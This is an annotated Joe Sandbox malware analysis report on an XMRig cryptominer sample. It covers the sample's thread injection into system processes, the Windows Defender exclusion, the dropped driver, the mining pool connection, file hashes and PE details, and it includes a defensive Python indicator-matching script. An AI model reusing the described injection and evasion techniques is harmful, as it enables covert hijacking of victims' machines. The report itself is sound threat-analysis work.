        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 131 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 713 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
        Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Files and Directories | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Behavior Graph (ID 1585416, sample xmr new.exe, start date 07/01/2025, architecture WINDOWS, score 100), flattened from the graph image into a process tree. Numbers in brackets are the graph's node IDs.

[2] Analysis root
    DNS: miners20002.com [55], pool.hashvault.pro [57]
    Signatures: Malicious sample detected (through community Yara rule) [65]; Multi AV Scanner detection for submitted file [67]; Yara detected Xmrig cryptocurrency miner [69]; 13 other signatures [71]
    Started: xmr new.exe [8], eejhedztifcv.exe [12]
[8] xmr new.exe
    Dropped: C:\ProgramData\...\eejhedztifcv.exe, PE32+ [51]
    Signatures: Modifies the context of a thread in another process (thread injection) [73]; Adds a directory exclusion to Windows Defender [75]; Modifies power options to not sleep / hibernate [77]
    Started: dialer.exe [14], powershell.exe [17], cmd.exe [19], 13 other processes [28]
[12] eejhedztifcv.exe
    Dropped: C:\Windows\Temp\zhgmaxoaawxc.sys, PE32+ [53]
    Signatures: Multi AV Scanner detection for dropped file [79]; Sample is not signed and drops a device driver [81]
    Started: dialer.exe [21], powershell.exe [23], dialer.exe [25], 11 other processes [30]
[14] dialer.exe (started by xmr new.exe)
    Signatures: Contains functionality to inject code into remote processes [83]; Writes to foreign memory regions [85]; Allocates memory in foreign processes [87]; Contains functionality to compare user and computer (likely to detect sandboxes) [89]
    Injected: lsass.exe [32], winlogon.exe [35], 2 other processes [41]
[17] powershell.exe (started by xmr new.exe)
    Signature: Loading BitLocker PowerShell Module [91]
    Started: conhost.exe [37]
[19] cmd.exe (started by xmr new.exe)
    Started: 2 other processes [43]
[21] dialer.exe (started by eejhedztifcv.exe)
    Signatures: Injects code into the Windows Explorer (explorer.exe) [93]; Creates a thread in another existing process (thread injection) [95]; Injects a PE file into a foreign processes [97]
    Started: 3 other processes [45]
[23] powershell.exe (started by eejhedztifcv.exe)
    Started: conhost.exe [39]
[25] dialer.exe (started by eejhedztifcv.exe)
    Network: pool.hashvault.pro 80.240.16.67, TCP 49708 -> 8888, AS-CHOOPAUS, Germany [59]; Detected Stratum mining protocol [101]
    Signature: Query firmware table information (likely to detect VMs) [99]
[28] 13 other processes -> 13 other processes [47]
[30] 11 other processes -> 11 other processes [49]
[32] lsass.exe (injected by dialer.exe [14])
    Signatures: Installs new ROOT certificates [61]; Writes to foreign memory regions [63]

Reading note: dialer.exe is the Windows Phone Dialer binary in System32 and does not inject into other processes or speak Stratum on its own; the injection and the pool connection attributed to the three dialer.exe nodes are the sample's code running inside a Microsoft-signed host process, so detections keyed on the image name of the connecting process alone will miss the miner.

Antivirus detection, submitted file:
    Source | Detection | Scanner | Label
    xmr new.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
Antivirus detection, dropped files:
    Source | Detection | Scanner | Label
    C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe | 74% | ReversingLabs | Win64.Infostealer.Tinba
    C:\Windows\Temp\zhgmaxoaawxc.sys | 5% | ReversingLabs | (no label)
Unpacked PE files, domains and URLs: No Antivirus matches.

Note that the ReversingLabs family label (Tinba, a banking trojan) does not agree with the Yara and behavioural classification of this sample as an Xmrig miner with a Stratum pool connection; treat the vendor label as a generic detection name, not as a family attribution. The 5% rate on the dropped driver means most engines miss it, so pivot on its SHA-256 rather than on AV verdicts.
Domains:
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    pool.hashvault.pro | 80.240.16.67 | true | false | (none) | high
    miners20002.com | unknown | unknown | true | (none) | unknown
URLs found in process memory (column layout flattened by extraction). Every entry was read from lsass.exe (process 00000025) memory dumps at 000002A290A2F000 or 000002A290A4E000; none is marked malicious and all carry reputation "high":
    http://schemas.xmlsoap.org/wsdl/soap12/P (trailing "P" as extracted; dumps 00000025.00000002.2797106117.000002A290A2F000 and 00000025.00000000.1535288923.000002A290A2F000)
    http://schemas.xmlsoap.org/ws/2005/07/securitypolicy (dumps 00000025.00000002.2797106117.000002A290A2F000, 00000025.00000002.2797238562.000002A290A4E000, 00000025.00000000.1535320717.000002A290A4E000, 00000025.00000000.1535288923.000002A290A2F000)
    http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 (dumps 00000025.00000002.2797106117.000002A290A2F000, 00000025.00000000.1535288923.000002A290A2F000)
    http://schemas.xmlsoap.org/ws/2005/02/trust (dumps 00000025.00000002.2797106117.000002A290A2F000, 00000025.00000000.1535288923.000002A290A2F000)
    http://docs.oasis-open.org/ws-sx/ws-trust/200512 (dumps 00000025.00000002.2797238562.000002A290A4E000, 00000025.00000000.1535320717.000002A290A4E000)
    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd (dumps 00000025.00000002.2797106117.000002A290A2F000, 00000025.00000000.1535288923.000002A290A2F000)
    http://schemas.xmlsoap.org/ws/2004/09/policy (dumps 00000025.00000002.2797106117.000002A290A2F000, 00000025.00000000.1535288923.000002A290A2F000)
    http://schemas.xmlsoap.org/wsdl/soap12/ (dump 00000025.00000000.1535288923.000002A290A2F000)
    http://schemas.xmlsoap.org/wsdl/ (dumps 00000025.00000002.2797106117.000002A290A2F000, 00000025.00000000.1535288923.000002A290A2F000)

These are WS-Trust, WS-SecurityPolicy, WS-Security and WSDL namespace URIs that lsass.exe carries in its own address space; they occur in both dump generations of the process (00000025.00000000.* and 00000025.00000002.*) and none of them is contacted in the network section, so they are noise from the injected host process, not indicators for this sample.
IPs:
    IP | Domain | Country | ASN | ASN Name | Malicious
    80.240.16.67 | pool.hashvault.pro | Germany | 20473 | AS-CHOOPAUS | false
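The behaviour graph above records a single connection from the injected dialer.exe to pool.hashvault.pro (80.240.16.67, TCP 49708 -> 8888) flagged as Stratum mining protocol. The following script, added here as an example and not part of the Joe Sandbox report, turns those indicators into a small network triage: it matches DNS and connection records against the pool domains, the pool IP and the destination port from the report, and decodes a captured TCP payload to decide whether it is a Stratum JSON-RPC message (XMRig's login/submit dialect or the classic mining.* dialect). The log lines and the Stratum payload embedded below are constructed for the example; the wallet string is a placeholder and the agent string is a simplified XMRig user agent.

```python
"""Network triage for the Xmrig sample in Joe Sandbox analysis 1585416.
Added example, not report code. Indicators come from the report's domain and
IP tables; SAMPLE_LOG and SAMPLE_PAYLOAD are constructed for illustration."""
import json
from dataclasses import dataclass
from typing import List, Optional

# Indicators taken from the report: both queried domains, the resolved pool IP
# and the destination port of the observed Stratum connection (49708 -> 8888).
POOL_DOMAINS = {"pool.hashvault.pro", "miners20002.com"}
POOL_IPS = {"80.240.16.67"}
POOL_PORTS = {8888}

# JSON-RPC methods of XMRig's Stratum dialect (login/submit/keepalived/job)
# and of the classic mining.* dialect used by other miners.
STRATUM_METHODS = {"login", "submit", "keepalived", "job",
                   "mining.subscribe", "mining.authorize", "mining.submit"}


@dataclass
class Finding:
    line_no: int
    severity: str   # "high": hit on a report IOC, "low": port heuristic only
    reason: str
    detail: str


def match_connections(log: str) -> List[Finding]:
    """Match records against the report's network IOCs.
    Record formats (constructed for this example):
        <ts> conn <src> <sport> <dst> <dport>
        <ts> dns  <src> <qname>
    """
    findings: List[Finding] = []
    for n, line in enumerate(log.splitlines(), 1):
        fields = line.split()
        if len(fields) < 4:
            continue
        kind = fields[1]
        if kind == "dns":
            qname = fields[3].rstrip(".").lower()
            if qname in POOL_DOMAINS:
                findings.append(Finding(n, "high", "pool-domain", qname))
        elif kind == "conn" and len(fields) >= 6:
            dst, dport = fields[4], int(fields[5])
            if dst in POOL_IPS:
                findings.append(Finding(n, "high", "pool-ip", f"{dst}:{dport}"))
            elif dport in POOL_PORTS:
                # Port alone is weak evidence: 8888 is also used by benign services,
                # and the context table shows the pool behind several other IPs.
                findings.append(Finding(n, "low", "pool-port", f"{dst}:{dport}"))
    return findings


def detect_stratum(payload: bytes) -> Optional[dict]:
    """Return {method, agent, login} if payload starts with a Stratum request.
    Stratum is newline-delimited JSON-RPC, so only the first line is inspected;
    responses (objects with "result" and no "method") are not classified."""
    try:
        first = payload.split(b"\n", 1)[0].decode("utf-8").strip()
        msg = json.loads(first)
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None
    if not isinstance(msg, dict) or msg.get("method") not in STRATUM_METHODS:
        return None
    params = msg.get("params")
    agent = login = ""
    if isinstance(params, dict):          # XMRig dialect: params is an object
        agent, login = str(params.get("agent", "")), str(params.get("login", ""))
    elif isinstance(params, list) and params and isinstance(params[0], str):
        agent = params[0]                  # mining.subscribe: first param is the agent
    return {"method": msg["method"], "agent": agent, "login": login}


# Constructed records: lines 1-2 mirror the report's lookup and connection,
# lines 3-4 are filler (a Microsoft login endpoint and an unrelated host on 8888).
SAMPLE_LOG = """\
2025-01-07T15:10:57Z dns  10.0.0.5 pool.hashvault.pro
2025-01-07T15:10:58Z conn 10.0.0.5 49708 80.240.16.67 8888
2025-01-07T15:10:59Z conn 10.0.0.5 49710 40.126.32.133 443
2025-01-07T15:11:02Z conn 10.0.0.5 49712 203.0.113.9 8888
"""

# Constructed XMRig login request; wallet and agent values are placeholders.
SAMPLE_PAYLOAD = (b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER",'
                  b'"pass":"x","agent":"XMRig/6.22.0","algo":["rx/0"]}}\n')

if __name__ == "__main__":
    for f in match_connections(SAMPLE_LOG):
        print(f"line {f.line_no}: [{f.severity}] {f.reason} {f.detail}")
    print("stratum:", detect_stratum(SAMPLE_PAYLOAD))
```

Severity is split deliberately: a hit on the domain or the resolved IP is a report indicator, while a bare destination port only merits a look, because the domain-context table further down shows pool.hashvault.pro resolving to 192.248.189.11, 5.188.137.200 and 37.203.243.102 in earlier analyses, so blocking should be keyed on the domain and the Stratum payload rather than on one IP.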
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1585416
                              Start date and time:2025-01-07 16:09:07 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 30s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:63
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:7
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:xmr new.exe
                              Detection:MAL
                              Classification:mal100.spyw.evad.mine.winEXE@90/12@4/1
                              EGA Information:
                              • Successful, ratio: 84.6%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, WmiPrvSE.exe
                              • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.134, 40.126.32.140, 40.126.32.74, 20.190.160.22, 40.126.32.138, 40.126.32.136, 20.190.160.17, 172.202.163.200
                              • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, login.live.com, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target eejhedztifcv.exe, PID 4752 because it is empty
                              • Execution Graph export aborted for target xmr new.exe, PID 2416 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: xmr new.exe
Time | Type | Description
10:10:04 | API Interceptor | 1x Sleep call for process: xmr new.exe modified
10:10:06 | API Interceptor | 57x Sleep call for process: powershell.exe modified
10:10:50 | API Interceptor | 425805x Sleep call for process: winlogon.exe modified
10:10:51 | API Interceptor | 341074x Sleep call for process: lsass.exe modified
10:10:52 | API Interceptor | 909x Sleep call for process: svchost.exe modified
10:10:53 | API Interceptor | 407399x Sleep call for process: dwm.exe modified
10:10:58 | API Interceptor | 1887x Sleep call for process: dialer.exe modified
                              No context
Domain context, match: pool.hashvault.pro (the "Get hash" and "Browse" link texts of the original table are dropped; the Context column is the IP recorded in that earlier analysis)
    Associated Sample Name | Detection | Threat Name | Context
    eth.exe | malicious | Xmrig | 192.248.189.11
    ZppxPm0ASs.exe | malicious | Xmrig | 5.188.137.200
    file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig | 5.188.137.200
    file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 37.203.243.102
    file.exe | malicious | Xmrig | 5.188.137.200
    file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 5.188.137.200
    file.exe | malicious | Xmrig | 37.203.243.102
    file.exe | malicious | DarkVision Rat, Xmrig | 37.203.243.102
    file.exe | malicious | Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar | 37.203.243.102
    file.exe | malicious | DarkVision Rat, Xmrig | 5.188.137.200

Across these analyses the same pool domain sat behind 192.248.189.11, 5.188.137.200 and 37.203.243.102, and in this run behind 80.240.16.67; a block or detection keyed on a single pool IP therefore ages quickly, and the domain plus the Stratum protocol signature are the durable indicators.
ASN context, match: AS-CHOOPAUS (link texts dropped; the Context column is the IP recorded in that earlier analysis)
    Associated Sample Name | Detection | Threat Name | Context
    eth.exe | malicious | Xmrig | 192.248.189.11
    cZO.exe | malicious | Unknown | 108.61.189.74
    Fantazy.arm7.elf | malicious | Mirai | 149.253.168.94
    momo.arm7.elf | malicious | Mirai | 137.220.48.181
    z0r0.x86.elf | malicious | Mirai | 45.32.45.161
    1.elf | malicious | Unknown | 185.103.202.108
    3.elf | malicious | Unknown | 108.61.224.55
    8n26gvrXUM.exe | malicious | Unknown | 144.202.34.112
    8n26gvrXUM.exe | malicious | Unknown | 144.202.34.112
    Setup.exe.7z | malicious | Unknown | 207.246.91.177
                              No context
Dropped file context (link texts dropped):
    C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe, previously seen as:
        kx new.exe | malicious | Unknown
        Solara.exe | malicious | Unknown
    C:\Windows\Temp\zhgmaxoaawxc.sys, previously seen as:
        eth.exe | malicious | Xmrig
        file.exe | malicious | Xmrig
        hiwA7Blv7C.exe | malicious | Xmrig
        5fr5gthkjdg71.exe | malicious | Quasar, R77 RootKit
        aAcx14Rjtw.exe | malicious | Xmrig
        SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig
        0Ty.png.exe | malicious | Xmrig
        Qhx6a6VLAH.exe | malicious | Xmrig
        88aext0k.exe | malicious | Xmrig
        gaozw40v.exe | malicious | Xmrig

The driver hash is shared by ten earlier Xmrig submissions and one sample classified as an R77 rootkit, so it is a reusable component rather than something unique to this build; its SHA-256 (listed in the dropped-file details below) is a better pivot than the 5% AV detection rate.
Dropped file: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Process:C:\Users\user\Desktop\xmr new.exe
Note: the MD5, SHA-1 and SHA-256 below are identical to those of the submitted sample, so xmr new.exe copies itself unchanged into a ProgramData directory and then runs that copy (node eejhedztifcv.exe in the behavior graph), which is why both files carry the same 74% detection rate.
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):5471744
                                                      Entropy (8bit):6.508687886623363
                                                      Encrypted:false
                                                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                                                      MD5:7D6398EBFB82A24748617189BF4AD691
                                                      SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                                                      SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                                                      SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 74%
                                                      Joe Sandbox View:
                                                      • Filename: kx new.exe, Detection: malicious, Browse
                                                      • Filename: Solara.exe, Detection: malicious, Browse
                                                      Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1628158735648508
                                                      Encrypted:false
                                                      SSDEEP:3:Nllluldhz/lL:NllU
                                                      MD5:03744CE5681CB7F5E53A02F19FA22067
                                                      SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                      SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                      SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                      Malicious:false
                                                      Preview:@...e.................................L..............@..........
Dropped file: PowerShell AppLocker probe
Note: this 60-byte file is written by powershell.exe itself when it starts, to test whether AppLocker is enforcing a script lockdown; it is a side effect of the sample invoking PowerShell, not a payload, and is not an indicator.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
(Three further records of the same 60-byte PowerShell AppLocker test file, with identical hashes and the same dropping process, omitted here.)
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
(Four further records of the same 60-byte PowerShell AppLocker test file, with identical hashes and the same dropping process, omitted here.)
Dropped file: C:\Windows\Temp\zhgmaxoaawxc.sys
Process:C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Note: the "native" subsystem marks this as a kernel-mode driver image rather than a user-mode executable; it is written by the ProgramData copy of the sample, not by the originally launched file, so a scan of the user's Desktop alone would not find the chain's second stage.
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Joe Sandbox View:
                                                      • Filename: eth.exe, Detection: malicious
                                                      • Filename: file.exe, Detection: malicious
                                                      • Filename: hiwA7Blv7C.exe, Detection: malicious
                                                      • Filename: 5fr5gthkjdg71.exe, Detection: malicious
                                                      • Filename: aAcx14Rjtw.exe, Detection: malicious
                                                      • Filename: SharcHack.exe, Detection: malicious
                                                      • Filename: 0Ty.png.exe, Detection: malicious
                                                      • Filename: Qhx6a6VLAH.exe, Detection: malicious
                                                      • Filename: 88aext0k.exe, Detection: malicious
                                                      • Filename: gaozw40v.exe, Detection: malicious
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.508687886623363
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:xmr new.exe
                                                      File size:5'471'744 bytes
                                                      MD5:7d6398ebfb82a24748617189bf4ad691
                                                      SHA1:6c96d0e343e1e84bf58670f1249c1694a2012f04
                                                      SHA256:d7cd81563e5b98b9a329286557de71186d3f8f364a46691aca253ca00e4c3ef2
                                                      SHA512:9aeb3da479b23880de94e0b283a562ce19a79c2b27cb819ddf8e149eca5673a42c659fff10ea2ea9036aedda6fef37b97ecbf37236dd22baf20eba1e6dda4b4a
                                                      SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                                                      TLSH:1946231CD42659E3CC8086FD583BE47C204CE9C143A0F54EF7CD73A659A11EB6ABA16E
                                                      File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`........................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6693B25F [Sun Jul 14 11:11:27 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:203d63d5d9a088e2d84cef737227986b
                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [0000AED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007FAF70C80B1Fh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [0000AEC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FAF70C80B40h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007FAF70C80B3Bh
                                                      dec esp
                                                      mov esi, dword ptr [0000D189h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007FAF70C80B17h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007FAF70C80AF9h
                                                      dec eax
                                                      mov edi, dword ptr [0000AE90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FAF70C80B1Eh
                                                      mov ecx, 0000001Fh
                                                      call 00007FAF70C8A8A4h
                                                      jmp 00007FAF70C80B39h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007FAF70C80B1Bh
                                                      mov byte ptr [00538531h], 00000001h
                                                      jmp 00007FAF70C80B2Bh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [0000AE7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [0000AE7Bh]
                                                      call 00007FAF70C8A89Bh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007FAF70C80B2Bh
                                                      dec eax
                                                      mov ecx, dword ptr [0000AE50h]
                                                      Name                                 | Virtual Address | Virtual Size | Is in Section
                                                      -------------------------------------|-----------------|--------------|--------------
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xe048          | 0x3c         | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x53c000        | 0x18c        | .pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x53f000        | 0x80         | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_TLS            | 0xc0a0          | 0x28         | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xc410          | 0x138        | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_IAT            | 0xe1e8          | 0x160        | .rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                      -----|-----------------|--------------|----------|-----|----------|-----------------|-----------|---------|----------------
                                                      .text | 0x1000 | 0xa0f6 | 0xa200 | be348e1197da186573828aa315fc4db2 | False | 0.48420621141975306 | data | 6.116855328972542 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata | 0xc000 | 0x27dc | 0x2800 | e31128bf99e88dedb7484f237316cda5 | False | 0.4818359375 | data | 4.794114525995956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data | 0xf000 | 0x52c0a8 | 0x52a800 | 730dcd080a6eba578d494ef18bf563bb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
